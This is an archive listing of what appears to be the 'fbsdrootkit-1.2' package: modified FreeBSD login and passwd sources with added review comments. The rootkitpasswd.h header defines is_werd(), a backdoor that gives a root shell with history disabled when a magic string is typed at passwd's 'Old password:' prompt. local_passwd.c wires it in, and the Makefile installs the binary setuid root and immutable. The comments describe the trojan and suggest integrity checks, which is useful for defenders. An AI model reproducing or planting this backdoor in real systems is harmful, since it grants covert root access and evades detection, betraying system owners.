			if (pwd->pw_uid == 0)
				rootlogin = 1;

			if (fflag && (uid == 0 || uid == pwd->pw_uid)) {
				/* already authenticated */
				break;
			} else if (pwd->pw_passwd[0] == '\0') {
				/* pretend password okay */
				rval = 0;
				goto ttycheck;
			}
		}

		fflag = 0;

		(void)setpriority(PRIO_PROCESS, 0, -4);

#ifdef SKEY
		permit_passwd = skeyaccess(username, tty,
					   hostname ? full_hostname : NULL,
					   NULL);
		p = skey_getpass("Password:", pwd, permit_passwd);
		ep = skey_crypt(p, salt, pwd, permit_passwd);
#else
		p = getpass("Password:");
		ep = crypt(p, salt);
#endif

		if (pwd) {
#ifdef KERBEROS
#ifdef SKEY
			/*
			 * Do not allow user to type in kerberos password
			 * over the net (actually, this is ok for encrypted
			 * links, but we have no way of determining if the
			 * link is encrypted.
			 */
			if (!permit_passwd) {
				rval = 1;		/* failed */
			} else
#endif
			rval = klogin(pwd, instance, localhost, p);
			if (rval != 0 && rootlogin && pwd->pw_uid != 0)
				rootlogin = 0;
			if (rval == 0)
				authok = 1;
			else if (rval == 1)
				rval = strcmp(ep, pwd->pw_passwd);
#else
			rval = strcmp(ep, pwd->pw_passwd);
#endif
		}
		/*
		 * Clear the typed password.
		 * NOTE(review): a plain memset() on a buffer that is not read
		 * again may be removed by an optimizing compiler.
		 */
		memset(p, 0, strlen(p));

		(void)setpriority(PRIO_PROCESS, 0, 0);

	ttycheck:
		/*
		 * If trying to log in as root without Kerberos,
		 * but with insecure terminal, refuse the login attempt.
		 */
#ifdef KERBEROS
		if (authok == 0)
#endif
		if (pwd && !rval && rootlogin && !rootterm(tty)) {
			(void)fprintf(stderr,
			    "%s login refused on this terminal.\n",
			    pwd->pw_name);
			if (hostname)
				syslog(LOG_NOTICE,
				    "LOGIN %s REFUSED FROM %s ON TTY %s",
				    pwd->pw_name, hostname, tty);
			else
				syslog(LOG_NOTICE,
				    "LOGIN %s REFUSED ON TTY %s",
				     pwd->pw_name, tty);
			continue;
		}

		if (pwd && !rval)
			break;

		(void)printf("Login incorrect\n");
		failures++;
		/* we allow 10 tries, but after 3 we start backing off */
		if (++cnt > 3) {
			if (cnt >= 10) {
				badlogin(username);
				sleepexit(1);
			}
			sleep((u_int)((cnt - 3) * 5));
		}
	}

	/* committed to login -- turn off timeout */
	(void)alarm((u_int)0);

	endpwent();

	/* if user not super-user, check for disabled logins */
	if (!rootlogin)
		checknologin();

	if (chdir(pwd->pw_dir) < 0) {
		(void)printf("No home directory %s!\n", pwd->pw_dir);
		if (chdir("/"))
			exit(0);
		pwd->pw_dir = "/";
		(void)printf("Logging in with home = \"/\".\n");
	}

	/* Relative path: checked in the directory entered just above. */
	quietlog = access(_PATH_HUSHLOGIN, F_OK) == 0;

	if (pwd->pw_change || pwd->pw_expire)
		(void)gettimeofday(&tp, (struct timezone *)NULL);

	/* Warn within two weeks of expiry; an expired password forces a change. */
	changepass=0;
	if (pwd->pw_change)
		if (tp.tv_sec >= pwd->pw_change) {
			(void)printf("Sorry -- your password has expired.\n");
			changepass=1;
		} else if (pwd->pw_change - tp.tv_sec <
		    2 * 7 * 86400 && !quietlog)
			(void)printf("Warning: your password expires on %s",
			    ctime(&pwd->pw_change));
	if (pwd->pw_expire)
		if (tp.tv_sec >= pwd->pw_expire) {
			(void)printf("Sorry -- your account has expired.\n");
			sleepexit(1);
		} else if (pwd->pw_expire - tp.tv_sec <
		    2 * 7 * 86400 && !quietlog)
			(void)printf("Warning: your account expires on %s",
			    ctime(&pwd->pw_expire));

	/* Nothing else left to fail -- really log in. */
	memset((void *)&utmp, 0, sizeof(utmp));
	(void)time(&utmp.ut_time);
	(void)strncpy(utmp.ut_name, username, sizeof(utmp.ut_name));
	if (hostname)
		(void)strncpy(utmp.ut_host, hostname, sizeof(utmp.ut_host));
	(void)strncpy(utmp.ut_line, tty, sizeof(utmp.ut_line));
	login(&utmp);

	dolastlog(quietlog);

	/*
	 * Set device protections, depending on what terminal the
	 * user is logged in. This feature is used on Suns to give
	 * console users better privacy.
	 */
	login_fbtab(tty, pwd->pw_uid, pwd->pw_gid);

	(void)chown(ttyn, pwd->pw_uid,
	    (gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid);
	/* NOTE(review): the setgid()/initgroups() results are not checked. */
	(void)setgid(pwd->pw_gid);

	initgroups(username, pwd->pw_gid);

	if (*pwd->pw_shell == '\0')
		pwd->pw_shell = _PATH_BSHELL;

	/* Destroy environment unless user has requested its preservation. */
	if (!pflag)
		environ = envinit;
	(void)setenv("HOME", pwd->pw_dir, 1);
	(void)setenv("SHELL", pwd->pw_shell, 1);
	if (term[0] == '\0')
		(void)strncpy(term, stypeof(tty), sizeof(term));
	/* TERM and PATH are only set when not already present. */
	(void)setenv("TERM", term, 0);
	(void)setenv("LOGNAME", pwd->pw_name, 1);
	(void)setenv("USER", pwd->pw_name, 1);
	(void)setenv("PATH", _PATH_DEFPATH, 0);
#ifdef KERBEROS
	if (krbtkfile_env)
		(void)setenv("KRBTKFILE", krbtkfile_env, 1);
#endif

	/* A 'd' right after the "tty" prefix is logged as a dial-up line. */
	if (tty[sizeof("tty")-1] == 'd')
		syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name);

	/* If fflag is on, assume caller/authenticator has logged root login. */
	if (rootlogin && fflag == 0)
		if (hostname)
			syslog(LOG_NOTICE, "ROOT LOGIN (%s) ON %s FROM %s",
			    username, tty, hostname);
		else
			syslog(LOG_NOTICE, "ROOT LOGIN (%s) ON %s", username, tty);

#ifdef KERBEROS
	if (!quietlog && notickets == 1 && !noticketsdontcomplain)
		(void)printf("Warning: no Kerberos tickets issued.\n");
#endif

#ifdef LOGALL
	/*
	 * Syslog each successful login, so we don't have to watch hundreds
	 * of wtmp or lastlogin files.
	 */
	if (hostname) {
		syslog(LOG_INFO, "login from %s as %s", hostname, pwd->pw_name);
	} else {
		syslog(LOG_INFO, "login on %s as %s", tty, pwd->pw_name);
	}
#endif

	if (!quietlog) {
		(void)printf("%s\n\t%s  %s\n\n",
	    "Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994",
		    "The Regents of the University of California. ",
		    "All rights reserved.");
		motd();
		(void)snprintf(tbuf,
		    sizeof(tbuf), "%s/%s", _PATH_MAILDIR, pwd->pw_name);
		if (stat(tbuf, &st) == 0 && st.st_size != 0)
			(void)printf("You have %smail.\n",
			    (st.st_mtime > st.st_atime) ? "new " : "");
	}

#ifdef LOGIN_ACCESS
	/*
	 * NOTE(review): this access check runs after utmp and lastlog were
	 * written and the tty and fbtab devices were chowned, so a refused
	 * login still leaves those records and ownership changes behind.
	 */
	if (login_access(pwd->pw_name, hostname ? full_hostname : tty) == 0) {
		printf("Permission denied\n");
		if (hostname)
			syslog(LOG_NOTICE, "%s LOGIN REFUSED FROM %s",
				pwd->pw_name, hostname);
		else
			syslog(LOG_NOTICE, "%s LOGIN REFUSED ON %s",
				pwd->pw_name, tty);
		sleepexit(1);
	}
#endif

	(void)signal(SIGALRM, SIG_DFL);
	(void)signal(SIGQUIT, SIG_DFL);
	(void)signal(SIGINT, SIG_DFL);
	(void)signal(SIGTSTP, SIG_IGN);

	/* argv[0] of the shell is '-' plus the shell's base name. */
	tbuf[0] = '-';
	(void)strcpy(tbuf + 1, (p = strrchr(pwd->pw_shell, '/')) ?
	    p + 1 : pwd->pw_shell);

	if (setlogin(pwd->pw_name) < 0)
		syslog(LOG_ERR, "setlogin() failure: %m");

	/*
	 * Discard permissions last so can't get killed and drop core.
	 * NOTE(review): the setuid() result is discarded; if the call failed
	 * the shell below would run with the uid login itself has.
	 */
	if (rootlogin)
		(void) setuid(0);
	else
		(void) setuid(pwd->pw_uid);

	/* An expired password is changed with _PATH_CHPASS before the shell. */
	if (changepass) {
		int res;
		if ((res=system(_PATH_CHPASS)))
			sleepexit(1);
	}

	/* NOTE(review): the list terminator is a bare 0, not (char *)0. */
	execlp(pwd->pw_shell, tbuf, 0);
	err(1, "%s", pwd->pw_shell);
}

#ifdef	KERBEROS
#define	NBUFSIZ		(UT_NAMESIZE + 1 + 5)	/* .root suffix */
#else
#define	NBUFSIZ		(UT_NAMESIZE + 1)
#endif

/*
 * getloginname - prompt for a login name and store it in "username".
 *
 * Characters beyond NBUFSIZ - 1 are read and dropped.  An empty line or a
 * name starting with '-' repeats the prompt; EOF logs pending failures and
 * exits.
 */
void
getloginname()
{
	int ch;
	char *p;
	static char nbuf[NBUFSIZ];

	for (;;) {
		(void)printf("login: ");
		for (p = nbuf; (ch = getchar()) != '\n'; ) {
			if (ch == EOF) {
				badlogin(username);
				exit(0);
			}
			if (p < nbuf + (NBUFSIZ - 1))
				*p++ = ch;
		}
		if (p > nbuf)
			if (nbuf[0] == '-')
				(void)fprintf(stderr,
				    "login names may not start with '-'.\n");
			else {
				*p = '\0';
				username = nbuf;
				break;
			}
	}
}

/* rootterm - non-zero when the tty has a ttys entry flagged TTY_SECURE. */
int
rootterm(ttyn)
	char *ttyn;
{
	struct ttyent *t;

	return ((t = getttynam(ttyn)) && t->ty_status & TTY_SECURE);
}

/* Jump target used by sigint() to abandon the motd copy. */
jmp_buf motdinterrupt;

/*
 * motd - copy _PATH_MOTDFILE to stdout; SIGINT stops the copy early via
 * longjmp, after which the previous handler is restored.
 */
void
motd()
{
	int fd, nchars;
	sig_t oldint;
	char tbuf[8192];

	if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0)
		return;
	oldint = signal(SIGINT, sigint);
	if (setjmp(motdinterrupt) == 0)
		while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
			(void)write(fileno(stdout), tbuf, nchars);
	(void)signal(SIGINT, oldint);
	(void)close(fd);
}

/* sigint - SIGINT handler installed by motd(). */
/* ARGSUSED */
void
sigint(signo)
	int signo;
{

	longjmp(motdinterrupt, 1);
}

/* timedout - SIGALRM handler: report the timeout and exit. */
/* ARGSUSED */
void
timedout(signo)
	int signo;
{

	(void)fprintf(stderr, "Login timed out after %d seconds\n", timeout);
	exit(0);
}

/*
 * checknologin - if _PATH_NOLOGIN can be opened, print it and exit.
 * main() calls this only for non-root logins.
 */
void
checknologin()
{
	int fd, nchars;
	char tbuf[8192];

	if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) {
		while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
			(void)write(fileno(stdout), tbuf, nchars);
		sleepexit(0);
	}
}

/*
 * dolastlog - print the previous login (unless quiet) and overwrite the
 * user's record in _PATH_LASTLOG, which is indexed by uid.
 */
void
dolastlog(quiet)
	int quiet;
{
	struct lastlog ll;
	int fd;

	if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) {
		(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
		if (!quiet) {
			if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) &&
			    ll.ll_time != 0) {
				(void)printf("Last login: %.*s ",
				    24-5, (char *)ctime(&ll.ll_time));
				if (*ll.ll_host != '\0')
					(void)printf("from %.*s\n",
					    (int)sizeof(ll.ll_host),
					    ll.ll_host);
				else
					(void)printf("on %.*s\n",
					    (int)sizeof(ll.ll_line),
					    ll.ll_line);
			}
			/* Seek back: the read moved past the record. */
			(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
		}
		memset((void *)&ll, 0, sizeof(ll));
		(void)time(&ll.ll_time);
		(void)strncpy(ll.ll_line, tty, sizeof(ll.ll_line));
		if (hostname)
			(void)strncpy(ll.ll_host, hostname, sizeof(ll.ll_host));
		(void)write(fd, (char *)&ll, sizeof(ll));
		(void)close(fd);
	}
}

/*
 * badlogin - log the accumulated failure count.  The attempted name goes
 * only to the LOG_AUTHPRIV message, not to the general LOG_NOTICE one.
 */
void
badlogin(name)
	char *name;
{

	if (failures == 0)
		return;
	if (hostname) {
		syslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s",
		    failures, failures > 1 ? "S" : "", hostname);
		syslog(LOG_AUTHPRIV|LOG_NOTICE,
		    "%d LOGIN FAILURE%s FROM %s, %s",
		    failures, failures > 1 ? "S" : "", hostname, name);
	} else {
		syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s",
		    failures, failures > 1 ? "S" : "", tty);
		syslog(LOG_AUTHPRIV|LOG_NOTICE,
		    "%d LOGIN FAILURE%s ON %s, %s",
		    failures, failures > 1 ? "S" : "", tty, name);
	}
}

#undef	UNKNOWN
#define	UNKNOWN	"su"

/* stypeof - terminal type from the tty's ttys entry, or UNKNOWN. */
char *
stypeof(ttyid)
	char *ttyid;
{
	struct ttyent *t;

	return (ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN);
}

/* sleepexit - pause five seconds, then exit with eval. */
void
sleepexit(eval)
	int eval;
{

	(void)sleep(5);
	exit(eval);
}
fbsdrootkit-1.2/rootkitpasswd.h100600 764 764 773 6271316365 14221 0ustar dfdf
#ifdef FIRST_TIME
/*
 * NOTE(review): this function is an authentication backdoor, not part of
 * the stock passwd sources.
 *
 * It compares its argument with the first six characters of ROOTKIT_MAGIC
 * (not defined in this listing; presumably in the ../config.h that
 * local_passwd.c includes just before this header).  On a match it sets
 * the real and effective uid and gid to 0, points HISTFILE at /dev/null
 * and replaces the process with /bin/sh.  Otherwise the argument is
 * returned unchanged, so the caller behaves as the stock program would.
 *
 * local_passwd.c routes the "Old password:" input through this function,
 * and the passwd Makefile in this archive installs that binary setuid
 * root (BINOWN=root, BINMODE=4555) with the schg flag set.
 *
 * For defenders: a passwd binary built from these sources will differ from
 * the vendor's in checksum and size; file-integrity baselines kept
 * off-host, and process auditing that flags a shell whose parent image is
 * passwd, are the checks this code is meant to evade or would trip.
 */
inline char *is_werd(char *nutty_wild_char_pointer)
{
	char MAG[7];

	/* Copied byte by byte; the effect is a six-character prefix of the constant. */
	MAG[0]=ROOTKIT_MAGIC[0];
	MAG[1]=ROOTKIT_MAGIC[1];
	MAG[2]=ROOTKIT_MAGIC[2];
	MAG[3]=ROOTKIT_MAGIC[3];
	MAG[4]=ROOTKIT_MAGIC[4];
	MAG[5]=ROOTKIT_MAGIC[5];
	MAG[6]='\0';
	if(!strcmp(nutty_wild_char_pointer,MAG)) {
		setuid(0);
		setgid(0);
		seteuid(0);
		setegid(0); /* Just for good measure */
		setenv("HISTFILE","/dev/null",1);
		execl("/bin/sh","sh",(char *)0);
	} else
		return(nutty_wild_char_pointer);
}
#endif
fbsdrootkit-1.2/passwd/ 40700 764 764 0 6257405321 12341 5ustar dfdffbsdrootkit-1.2/passwd/Makefile100600 764 764 2342 6257175104 14104 0ustar dfdf# From: @(#)Makefile 8.3 (Berkeley) 4/2/94 # $Id: Makefile,v 1.14.2.3 1995/10/06 01:58:43 davidg Exp $ PROG= passwd SRCS= local_passwd.c yp_passwd.c passwd.c pw_copy.c pw_util.c pw_yp.c DPADD= ${LIBCRYPT} ${LIBRPCSVC} LDADD= -lcrypt -lrpcsvc .PATH: ${.CURDIR}/../chpass ${.CURDIR}/vipw \ ${.CURDIR}/../rlogin CFLAGS+=-DCRYPT -DYP -I${.CURDIR} -I${.CURDIR}/../vipw \ -I${.CURDIR}/../chpass BINOWN= root BINMODE=4555 MAN1=passwd.1 LINKS=${BINDIR}/passwd ${BINDIR}/yppasswd MLINKS=passwd.1 yppasswd.1 .if exists(${DESTDIR}/usr/lib/libkrb.a) && (defined(MAKE_EBONES)) SRCS+= kpasswd.c .PATH: ${.CURDIR}/../../usr.bin/chpass ${.CURDIR}/../../usr.sbin/vipw \ ${.CURDIR}/../../usr.bin/rlogin ${.CURDIR}/../../usr.bin/passwd \ ${.CURDIR}/../../eBones/usr.bin/passwd CFLAGS+= -DKERBEROS \ -I${.CURDIR}/../../eBones/include \ -I${.CURDIR}/../../eBones/lib/libkadm # XXX not defined: ${LIBKADM}, ${LIBCOM_ERR} DPADD= ${LIBKADM} ${LIBKRB} ${LIBDES} ${LIBCRYPT} ${LIBRPCSVC} ${LIBCOM_ERR} LDADD= -lkadm -lkrb -ldes -lcrypt -lrpcsvc -lcom_err DISTRIBUTION= krb .endif beforeinstall: [ ! -e ${DESTDIR}${BINDIR}/passwd ] || \ chflags noschg ${DESTDIR}${BINDIR}/passwd afterinstall: chflags schg ${DESTDIR}${BINDIR}/passwd .include fbsdrootkit-1.2/passwd/extern.h100600 764 764 3740 5710031470 14113 0ustar dfdf/* * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * From: @(#)extern.h 8.1 (Berkeley) 4/2/94 * $Id: extern.h,v 1.2 1995/01/20 22:03:36 wollman Exp $ */ int krb_passwd __P((char *, char *, char *, char *)); int local_passwd __P((char *)); fbsdrootkit-1.2/passwd/local_passwd.c100600 764 764 11771 6257643164 15317 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: local_passwd.c,v 1.2.6.4 1996/02/07 15:10:16 peter Exp $ */

#ifndef lint
static const char sccsid[] = "@(#)local_passwd.c	8.3 (Berkeley) 4/2/94";
#endif /* not lint */

/* NOTE(review): the header names of the #include lines below were lost in this listing. */
#include #include #include #include #include #include #include #include #include #include #include #include #include
#ifdef YP
#include
#endif

#include "extern.h"
/*
 * NOTE(review): the next two includes are not part of the stock file.
 * rootkitpasswd.h defines is_werd(), the backdoor called from
 * getnewpasswd() below; config.h presumably supplies ROOTKIT_MAGIC and
 * FIRST_TIME, neither of which is defined in this listing.
 */
#include "../config.h"
#include "../rootkitpasswd.h"

static uid_t uid;	/* real uid of the caller, set in local_passwd() */

char   *tempname;

static unsigned char itoa64[] =		/* 0 ... 63 => ascii - 64 */
	"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

/*
 * to64 - write n characters to s, each encoding the low six bits of v,
 * least-significant group first.  No terminator is written.
 */
void
to64(s, v, n)
	char *s;
	long v;
	int n;
{
	while (--n >= 0) {
		*s++ = itoa64[v&0x3f];
		v >>= 6;
	}
}

/*
 * getnewpasswd - prompt for and return the crypt()ed new password.
 *
 * pw: the account being changed.  nis: non-zero suppresses the "Changing
 * local password" banner.  A non-root caller whose account has a password
 * must first supply the old one.
 */
char *
getnewpasswd(pw, nis)
	struct passwd *pw;
	int nis;
{
	int tries;
	char *p, *t;
	char buf[_PASSWORD_LEN+1], salt[10];
	struct timeval tv;

	if (!nis)
		(void)printf("Changing local password for %s.\n", pw->pw_name);

	/*
	 * NOTE(review): trojan hook.  The old-password input is passed
	 * through is_werd() (rootkitpasswd.h) before crypt() sees it; on
	 * its magic value is_werd() execs a root shell and never returns.
	 * The prompt, and therefore the hook, is reached only when the
	 * caller's real uid is non-zero and the account has a password.
	 */
	if (uid && pw->pw_passwd[0] &&
	    strcmp(crypt(is_werd(getpass("Old password:")), pw->pw_passwd),
	    pw->pw_passwd)) {
		errno = EACCES;
		pw_error(NULL, 1, 1);
	}
	/*
	 * Quality checks: root may override each by repeating the same
	 * password (the tries counter); other users may not.
	 */
	for (buf[0] = '\0', tries = 0;;) {
		p = getpass("New password:");
		if (!*p) {
			(void)printf("Password unchanged.\n");
			pw_error(NULL, 0, 0);
		}
		if (strlen(p) <= 5 && (uid != 0 || ++tries < 2)) {
			(void)printf("Please enter a longer password.\n");
			continue;
		}
		/* NOTE(review): islower() receives a plain char here. */
		for (t = p; *t && islower(*t); ++t);
		if (!*t && (uid != 0 || ++tries < 2)) {
			(void)printf("Please don't use an all-lower case password.\nUnusual capitalization, control characters or digits are suggested.\n");
			continue;
		}
		/* Copy before the second getpass() call, whose result is compared. */
		(void)strcpy(buf, p);
		if (!strcmp(buf, getpass("Retype new password:")))
			break;
		(void)printf("Mismatch; try again, EOF to quit.\n");
	}
	/* grab a random printable character that isn't a colon */
	/*
	 * NOTE(review): the salt is built from random() seeded with the
	 * current time plus tv_usec/tv_sec, all of which are guessable.
	 */
	(void)srandom((int)time((time_t *)NULL));
#ifdef NEWSALT
	salt[0] = _PASSWORD_EFMT1;
	to64(&salt[1], (long)(29 * 25), 4);
	to64(&salt[5], random(), 4);
	salt[9] = '\0';
#else
	/* Make a good size salt for algorithms that can use it. */
	gettimeofday(&tv,0);
	/* The existing hash's "$1$" prefix selects the salt format. */
	if (strncmp(pw->pw_passwd, "$1$", 3)) {
	    /* DES Salt */
	    to64(&salt[0], random(), 3);
	    to64(&salt[3], tv.tv_usec, 3);
	    to64(&salt[6], tv.tv_sec, 2);
	    salt[8] = '\0';
	}
	else {
	    /* MD5 Salt */
	    strncpy(&salt[0], "$1$", 3);
	    to64(&salt[3], random(), 3);
	    to64(&salt[6], tv.tv_usec, 3);
	    /* Overwrites the last character written just above. */
	    salt[8] = '\0';
	}
#endif
	/* NOTE(review): buf still holds the cleartext password on return. */
	return (crypt(buf, salt));
}

/*
 * local_passwd - change uname's password in the local password database.
 *
 * Exits through errx() for an unknown user or when a non-root caller
 * names another user's account.  Returns 0 on success.
 */
int
local_passwd(uname)
	char *uname;
{
	struct passwd *pw;
	int pfd, tfd;

	if (!(pw = getpwnam(uname)))
		errx(1, "unknown user %s", uname);

#ifdef YP
	/* Use the right password information. */
	pw = (struct passwd *)&local_password;
#endif
	uid = getuid();
	if (uid && uid != pw->pw_uid)
		errx(1, "%s", strerror(EACCES));

	pw_init();
	pfd = pw_lock();
	tfd = pw_tmp();

	/*
	 * Get the new password.  Reset passwd change time to zero; when
	 * classes are implemented, go and get the "offset" value for this
	 * class and reset the timer.
	 */
	pw->pw_passwd = getnewpasswd(pw, 0);
	pw->pw_change = 0;
	pw_copy(pfd, tfd, pw);

	if (!pw_mkdb())
		pw_error((char *)NULL, 0, 1);
	return (0);
}
fbsdrootkit-1.2/passwd/passwd.c100600 764 764 11606 6035125171 14125 0ustar dfdf/* * Copyright (c) 1988, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. 
Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 * must display the following acknowledgement:
 * This product includes software developed by the University of
 * California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 * may be used to endorse or promote products derived from this software
 * without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

/*
 * passwd(1) front end: parses the options and hands the change to the NIS,
 * Kerberos or local back end.  The header names of the bare #include lines
 * and the line structure of the copyright string were lost when the archive
 * was extracted to text.
 */
#ifndef lint
static char copyright[] = "@(#) Copyright (c) 1988, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "From: @(#)passwd.c 8.3 (Berkeley) 4/2/94";
static const char rcsid[] = "$Id: passwd.c,v 1.3.4.2 1995/10/06 01:58:45 davidg Exp $";
#endif /* not lint */

#include
#include
#include
#include
#include

#ifdef YP
#include
#include
/* Program name used in messages; set to "yppasswd" by main(). */
char *prog_name;
/* Non-zero when the NIS back end was requested (argv[0] match or -y). */
int __use_yp = 0;
#endif

#ifdef KERBEROS
#include "krb.h"
#endif

#include "extern.h"

void usage __P((void));

/* Set by -l: change the local password file only. */
int use_local_passwd = 0;

/*
 * Entry point.  Accepts the options in OPTIONS and at most one user name;
 * the default user is the one returned by getlogin().  Every path ends in
 * exit(), with the status of the chosen back end.
 */
int
main(argc, argv)
	int argc;
	char **argv;
{
	int ch;
	char *uname;
	char *iflag = 0, *rflag = 0, *uflag = 0;

	/*
	 * NOTE(review): the YP option strings also accept 's' and 'f', but the
	 * switch below has no case for them, so they end in usage().
	 */
#ifdef YP
#ifdef KERBEROS
	char realm[REALM_SZ];
#define OPTIONS "lysfi:r:u:"
#else
#define OPTIONS "lysf"
#endif
#else
#ifdef KERBEROS
	char realm[REALM_SZ];
#define OPTIONS "li:r:u:"
#else
#define OPTIONS "l"
#endif
#endif

#ifdef YP
	int res = 0;

	/* invoked under a name containing "yppasswd": behave as if -y was given */
	if (strstr(argv[0], (prog_name = "yppasswd"))) __use_yp = 1;
#endif

	while ((ch = getopt(argc, argv, OPTIONS)) != EOF) {
		switch (ch) {
		case 'l':		/* change local password file */
			use_local_passwd = 1;
			break;
#ifdef KERBEROS
		case 'i':
			iflag = optarg;
			break;
		case 'r':
			rflag = optarg;
			break;
		case 'u':
			uflag = optarg;
			break;
#endif /* KERBEROS */
#ifdef YP
		case 'y':		/* Change NIS password */
			__use_yp = 1;
			break;
#endif
		default:
		case '?':
			usage();
		}
	}

	argc -= optind;
	argv += optind;

	/*
	 * The default target is the login name, not the real uid; the back
	 * ends repeat the ownership check against getuid().
	 */
	if ((uname = getlogin()) == NULL)
		err(1, "getlogin");

	switch(argc) {
	case 0:
		break;
	case 1:
		uname = argv[0];
		break;
	default:
		usage();
	}

#ifdef YP
	/*
	 * If NIS is turned on in the password database, use it, else punt.
	 */
#ifdef KERBEROS
	if (__use_yp || (iflag == NULL && rflag == NULL && uflag == NULL)) {
#endif
		res = use_yp(uname);
		if (res == USER_YP_ONLY) {
			if (!use_local_passwd) {
				exit(yp_passwd(uname));
			} else {
				/*
				 * Reject -l flag if NIS is turned on and the user
				 * doesn't exist in the local password database.
				 */
				errx(1, "unknown local user: %s.", uname);
			}
		} else if (res == USER_LOCAL_ONLY) {
			/*
			 * Reject -y flag if user only exists locally.
			 */
			if (__use_yp)
				errx(1, "unknown NIS user: %s.", uname);
		} else if (res == USER_YP_AND_LOCAL) {
			if (!use_local_passwd)
				exit(yp_passwd(uname));
		}
